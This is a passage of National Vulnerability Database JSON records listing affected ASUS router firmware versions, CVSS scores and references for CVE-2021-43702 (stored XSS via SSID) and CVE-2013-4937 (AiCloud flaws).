{ "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac68r:-:*:*:*:*:*:*:*", "matchCriteriaId": "4D2F0504-2FB5-4983-BD98-8080D4BF49DA", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac68p_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "FFA9DBF2-5A51-47D3-A428-6E20D8472EAD", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac68p:-:*:*:*:*:*:*:*", "matchCriteriaId": "5713F0F3-B616-42B7-A0D8-7983F00E79FE", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac68w_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "264E599A-8E85-43B7-90AF-B6CE6441B992", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac68w:-:*:*:*:*:*:*:*", "matchCriteriaId": "DBB2F5A0-ADD6-4725-8B27-F10B5F4CEC6A", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac68uf_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "4D207FED-F8B3-4330-B79C-CA28485B6B41", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac68uf:-:*:*:*:*:*:*:*", "matchCriteriaId": "85422660-7559-4ED0-8ED3-DF928C50FD4C", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n12e_b1_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "0921E20F-8495-4543-B202-A362E8ADB8F8", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n12e_b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "992A3E02-BBC4-4738-AF26-5278E31F1F08", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n12e_c1_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "CC9E35F7-FAD2-4941-98C7-2AE5FCC0881A", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n12e_c1:-:*:*:*:*:*:*:*", "matchCriteriaId": "D17BCFEC-0436-48F0-BE18-3A2018D0A5C4", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac65u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "7D6CC243-6267-4AB0-824E-96FE4C21284B", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac65u:-:*:*:*:*:*:*:*", "matchCriteriaId": "75F69BB5-8269-4E72-9BDE-60964F833C99", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n12hp_b1_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "A8D4E0FF-1E2C-4576-B5AB-B9A1ABECDF9D", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n12hp_b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "3FF2DDFE-344F-4A69-B347-0A29512EE5BA", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac1900_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "109295F0-5525-449A-991C-18004AAEFCB4", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac1900:-:*:*:*:*:*:*:*", "matchCriteriaId": "6E715D86-A7FC-415E-8C13-1ACAF9C49C3A", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n12vp_b1_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "E69AA872-568F-4F6D-9715-1ED1A4E2C8D2", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n12vp_b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "FCB81E20-E712-4F44-832C-8A7503316164", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac1900p_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "B344B5B3-D690-4639-815C-62B6024D5B56", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac1900p:-:*:*:*:*:*:*:*", "matchCriteriaId": "F1E5EEF4-D19B-41D1-86B6-F2CBB745570E", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac1900u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "C38788F7-3288-47B3-8793-98E16D7D758A", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac1900u:-:*:*:*:*:*:*:*", "matchCriteriaId": "0E285091-0B5F-43AE-A59C-4D3439E77053", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n12\\+_b1_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "83A102DA-FA2E-4F02-890B-1BAA599A16FE", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n12\\+_b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "C77F3227-992F-4F53-86CC-DDD842B6C6C9", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac1750_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "78B5BD13-0EA3-465A-BF46-21A242CF6977", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac1750:-:*:*:*:*:*:*:*", "matchCriteriaId": "59001E8D-E835-464A-915A-AAF59F2F397F", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n12d1_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "394D1205-366E-4F95-9D84-F083F61B24CC", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n12d1:-:*:*:*:*:*:*:*", "matchCriteriaId": "06E99301-3EC0-4E09-AB00-A0AB1AC0AA97", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac1750_b1__firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "4DD5E72B-CF7A-4EAB-9F4C-64BE953029F6", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac1750_b1_:-:*:*:*:*:*:*:*", "matchCriteriaId": "A8D10D10-1F57-4157-89BD-A711D3024B10", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:4g-ac53u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "6FBED666-37F7-49B4-BBDB-7999FC82AF12", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:4g-ac53u:-:*:*:*:*:*:*:*", "matchCriteriaId": "2B3381A1-5169-4DA9-BC6F-8FDBD7090FC4", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac66u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "18ED9E0E-2E5A-4FB0-86A8-E452D385F8B9", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac66u:-:*:*:*:*:*:*:*", "matchCriteriaId": "1ED39CBC-80ED-4037-9285-4D4CFA45F00E", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac66r_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "41A6A080-7612-4AF2-AF1E-339E00B9A889", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac66r:-:*:*:*:*:*:*:*", "matchCriteriaId": "4D59C40A-D9BA-455B-9F9E-D3B6FB80BC13", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac66w_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "9B4ECE7F-6173-4637-85DF-7B44EA41FFA2", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac66w:-:*:*:*:*:*:*:*", "matchCriteriaId": "5D988AC4-60B7-4388-8589-A04CACC2CB31", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:4g-ac68u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "5250DC13-AC0E-4E95-9450-AAF420E5E2C4", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:4g-ac68u:-:*:*:*:*:*:*:*", "matchCriteriaId": "46317EAB-C1A9-4811-9DB4-767A58E92A3B", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "ASUS RT-A88U 3.0.0.4.386_45898 is vulnerable to Cross Site Scripting (XSS). The ASUS router admin panel does not sanitize the WiFI logs correctly, if an attacker was able to change the SSID of the router with a custom payload, they could achieve stored XSS on the device." }, { "lang": "es", "value": "ASUS RT-A88U versi\u00f3n 3.0.0.4.386_45898 es vulnerable a un ataque de tipo Cross Site Scripting (XSS).\u0026#xa0;El panel de administraci\u00f3n del enrutador ASUS no desinfecta los registros de WiFI correctamente, si un atacante pudiera cambiar el SSID del enrutador con una carga \u00fatil personalizada, podr\u00eda obtener XSS almacenado en el dispositivo" } ], "id": "CVE-2021-43702", "lastModified": "2024-11-21T06:29:39.093", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 6.0, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2022-07-05T12:15:07.830", "references": [ { "source": "cve@mitre.org", "tags": [ "Product", "Vendor Advisory" ], "url": "https://www.asus.com/uk/Networking-IoT-Servers/WiFi-Routers/ASUS-WiFi-Routers/RT-AC88U/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.kroll.com/en/insights/publications/cyber/cve-2021-43702-from-discovery-to-patch" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Vendor Advisory" ], "url": "https://www.asus.com/uk/Networking-IoT-Servers/WiFi-Routers/ASUS-WiFi-Routers/RT-AC88U/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.kroll.com/en/insights/publications/cyber/cve-2021-43702-from-discovery-to-patch" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-79" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac66u_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "2BC5E8AB-ADD3-4C8D-ABAB-6D899174280E", "versionEndIncluding": "3.0.0.4.354", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-ac66u_firmware:3.0.0.4.140:*:*:*:*:*:*:*", "matchCriteriaId": "A946A449-7623-48FE-878A-E17DA2F41A11", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-ac66u_firmware:3.0.0.4.220:*:*:*:*:*:*:*", "matchCriteriaId": "A023852A-84B7-4937-886D-8893CD778DDF", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-ac66u_firmware:3.0.0.4.246:*:*:*:*:*:*:*", "matchCriteriaId": "FDB8B4AB-0EF4-4963-AE20-F4F1C3ABFC26", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-ac66u_firmware:3.0.0.4.260:*:*:*:*:*:*:*", "matchCriteriaId": "553DE051-C59F-4B16-A733-C2055B14DB1E", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-ac66u_firmware:3.0.0.4.270:*:*:*:*:*:*:*", "matchCriteriaId": "37AE944A-EF53-4F57-8A86-7DE209F00D17", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac66u:-:*:*:*:*:*:*:*", "matchCriteriaId": "1ED39CBC-80ED-4037-9285-4D4CFA45F00E", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n66u_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "C801E60F-6D3D-4179-AA38-1268338C03DE", "versionEndIncluding": "3.0.0.4.370", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n66u_firmware:3.0.0.4.272:*:*:*:*:*:*:*", "matchCriteriaId": "82C3DA99-69D6-4C2D-B485-7785EEDA38F5", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n66u:-:*:*:*:*:*:*:*", "matchCriteriaId": "7A60BB38-11FC-48C4-B592-29C6C3A6FEAE", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n65u_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "0D4769A7-BFC5-43DF-9FEE-14CC9BB8BD4F", "versionEndIncluding": "3.0.0.4.346", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n65u_firmware:3.0.0.3.134:*:*:*:*:*:*:*", "matchCriteriaId": "02E9974C-F3E1-4145-865F-974982804823", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n65u_firmware:3.0.0.3.176:*:*:*:*:*:*:*", "matchCriteriaId": "B3979CD4-DFBC-460C-8E92-879F7C355D52", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n65u_firmware:3.0.0.4.260:*:*:*:*:*:*:*", "matchCriteriaId": "1EA3F63E-F4FA-4066-AEA0-B1149E4B1190", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n65u_firmware:3.0.0.4.334:*:*:*:*:*:*:*", "matchCriteriaId": "1E9A77E0-1CC3-4E07-B99A-8DC750C982F8", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n65u_firmware:3.0.0.4.342:*:*:*:*:*:*:*", "matchCriteriaId": "642056A2-9B4E-465C-8333-392C70D658AD", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n65u:-:*:*:*:*:*:*:*", "matchCriteriaId": "B5567C97-0AE2-429B-B4D7-1CF501BD2C07", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n14u_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "5B3FB0ED-9BF8-4F77-AEA0-536A961CE5F5", "versionEndIncluding": "3.0.0.4.356", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n14u_firmware:3.0.0.4.322:*:*:*:*:*:*:*", "matchCriteriaId": "C7A0A4C1-226A-42D5-A728-CBB7D2B02A50", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n14u:-:*:*:*:*:*:*:*", "matchCriteriaId": "85B0C29C-29A5-4659-8D76-9241B13682DF", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n16_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "EE3A93F2-C6C1-48F9-9273-3A322A8951A8", "versionEndIncluding": "3.0.0.4.354", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n16_firmware:1.0.1.9:*:*:*:*:*:*:*", "matchCriteriaId": "C76611FB-9811-48E5-8F16-824A15CFC226", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n16_firmware:1.0.2.3:*:*:*:*:*:*:*", "matchCriteriaId": "6887911A-9CD0-419C-AE2E-932F8AD179DB", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n16_firmware:3.0.0.3.108:*:*:*:*:*:*:*", "matchCriteriaId": "65D943A4-CD5D-4381-8C4F-FF4FC600F226", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n16_firmware:3.0.0.3.162:*:*:*:*:*:*:*", "matchCriteriaId": "5AA3CD4B-B518-459B-AFF5-CCFF47D3BAEA", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n16_firmware:3.0.0.3.178:*:*:*:*:*:*:*", "matchCriteriaId": "939D788D-BFF7-4DEB-8C47-751532E4AC36", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n16_firmware:3.0.0.4.220:*:*:*:*:*:*:*", "matchCriteriaId": "DF6BBB0E-D69B-4854-8A5C-D6C20ABB857E", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n16_firmware:3.0.0.4.246:*:*:*:*:*:*:*", "matchCriteriaId": "8C1CCB22-3D8D-4618-819B-2EA14C42A4C4", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n16_firmware:3.0.0.4.260:*:*:*:*:*:*:*", "matchCriteriaId": "715FFC31-33A1-469E-BF65-4749F6643EEF", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n16_firmware:7.0.2.38b:*:*:*:*:*:*:*", "matchCriteriaId": "2E0EAF76-C2F8-4AD5-BF3D-0922DEED7B46", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n16:-:*:*:*:*:*:*:*", "matchCriteriaId": "3E016FE0-0A28-49AA-A213-38A5F7728FE2", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n56u_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "3027E138-144F-4E36-8C6C-E4A3E71CB1E7", "versionEndIncluding": "3.0.0.4.360", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n56u_firmware:1.0.1.4:*:*:*:*:*:*:*", "matchCriteriaId": "6D8E3CB7-1ADA-428C-881F-BB266991F39D", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n56u_firmware:1.0.1.4o:*:*:*:*:*:*:*", "matchCriteriaId": "699F6C57-F1AE-4AF5-BF56-529D41C91068", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n56u_firmware:1.0.1.7c:*:*:*:*:*:*:*", "matchCriteriaId": "F17E0B8C-7BA1-4FC5-84EC-4FFC87A9AC12", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n56u_firmware:1.0.1.7f:*:*:*:*:*:*:*", "matchCriteriaId": "69C68ABB-391D-45D8-9250-D93F8BFE305C", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n56u_firmware:1.0.1.8j:*:*:*:*:*:*:*", "matchCriteriaId": "D1FDDF9C-4C30-4AAC-9449-7404181071B9", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n56u_firmware:1.0.1.8l:*:*:*:*:*:*:*", "matchCriteriaId": "2DE8F24A-837B-4198-B8F6-E42386D2F524", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n56u_firmware:1.0.1.8n:*:*:*:*:*:*:*", "matchCriteriaId": "14A9D580-ACD6-4F2F-9322-E6B4C72C8BE9", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n56u_firmware:3.0.0.4.318:*:*:*:*:*:*:*", "matchCriteriaId": "E2660735-2247-42D9-9BAA-D785D18E6F51", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n56u_firmware:3.0.0.4.334:*:*:*:*:*:*:*", "matchCriteriaId": "401BB537-95FB-4BFB-BC40-CD73817D7E9A", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n56u_firmware:3.0.0.4.342:*:*:*:*:*:*:*", "matchCriteriaId": "04A7CA72-DFAD-4E9A-BB3E-EAE9973C19C7", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n56u_firmware:7.0.1.21:*:*:*:*:*:*:*", "matchCriteriaId": "64BCA764-5BAD-4CAB-B39F-A1D67E44EDA9", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n56u_firmware:7.0.1.32:*:*:*:*:*:*:*", "matchCriteriaId": "8CF40558-B7F8-4A2B-9819-EE3DD2C183AD", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:rt-n56u_firmware:8.1.1.4:*:*:*:*:*:*:*", "matchCriteriaId": "F70D82C1-764C-4DF0-B296-964602D0EC54", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n56u:-:*:*:*:*:*:*:*", "matchCriteriaId": "534C0C95-9DD2-464C-8776-01B47398FE13", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:dsl-n56u_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "6573DB51-CD36-4F99-82D6-EE52CA0E5136", "versionEndIncluding": "3.0.0.4.364", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:dsl-n56u_firmware:1.0.0.9:*:*:*:*:*:*:*", "matchCriteriaId": "3A02DC87-A0B4-460F-BE23-AFF51F52427C", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:dsl-n56u_firmware:3.0.0.4.188:*:*:*:*:*:*:*", "matchCriteriaId": "AE119718-A2F2-47A8-869F-3229A788EB04", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:dsl-n56u_firmware:3.0.0.4.314:*:*:*:*:*:*:*", "matchCriteriaId": "5199B461-E2F0-4F35-963E-B3716AB5A04E", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:dsl-n55u:-:*:*:*:*:*:*:*", "matchCriteriaId": "B81970C5-B766-4D2E-91EE-ADD5A9B77FF8", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors." }, { "lang": "es", "value": "M\u00faltiples vulnerabilidades no especificadas en la caracter\u00edstica AiCloud de los ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, y DSL-N55U con firmware anteriores a v3.0.4.372 tienen impacto y vectores de ataque desconocidos." } ], "id": "CVE-2013-4937", "lastModified": "2024-11-21T01:56:43.360", "metrics": { "cvssMetricV2": [ { "acInsufInfo": true, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ] }, "published": "2013-07-26T12:05:40.867", "references": [ { "source": "cve@mitre.org", "url": "http://reviews.cnet.com/8301-3132_7-57594003-98" }, { "source": "cve@mitre.org", "url": "http://twitter.com/ASUSUSA/statuses/357612236392509440" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "url": "http://reviews.cnet.com/8301-3132_7-57594003-98" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "url": "http://twitter.com/ASUSUSA/statuses/357612236392509440" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "NVD-CWE-noinfo" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
Vendor | Product | Version | |
---|---|---|---|
asus | tm-ac1900_firmware | 3.0.0.4..374_979 | |
asus | tm-ac1900 | - | |
asus | rt-n56u_firmware | 3.0.0.4..374_979 | |
asus | rt-n56u | - | |
asus | rt-ac66u_firmware | 3.0.0.4..374_979 | |
asus | rt-ac66u | - |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:tm-ac1900_firmware:3.0.0.4..374_979:*:*:*:*:*:*:*", "matchCriteriaId": "AAD9DC72-BBEA-4152-9109-2C0136832B4C", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:tm-ac1900:-:*:*:*:*:*:*:*", "matchCriteriaId": "B7BB1518-24C4-4822-A040-9AB8F16B1C53", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n56u_firmware:3.0.0.4..374_979:*:*:*:*:*:*:*", "matchCriteriaId": "5D76427C-05A6-475E-A199-3E86683CF266", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n56u:-:*:*:*:*:*:*:*", "matchCriteriaId": "534C0C95-9DD2-464C-8776-01B47398FE13", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac66u_firmware:3.0.0.4..374_979:*:*:*:*:*:*:*", "matchCriteriaId": "446DE8B4-C6E2-4292-8CD5-D890515E9F6A", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac66u:-:*:*:*:*:*:*:*", "matchCriteriaId": "1ED39CBC-80ED-4037-9285-4D4CFA45F00E", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Multiple 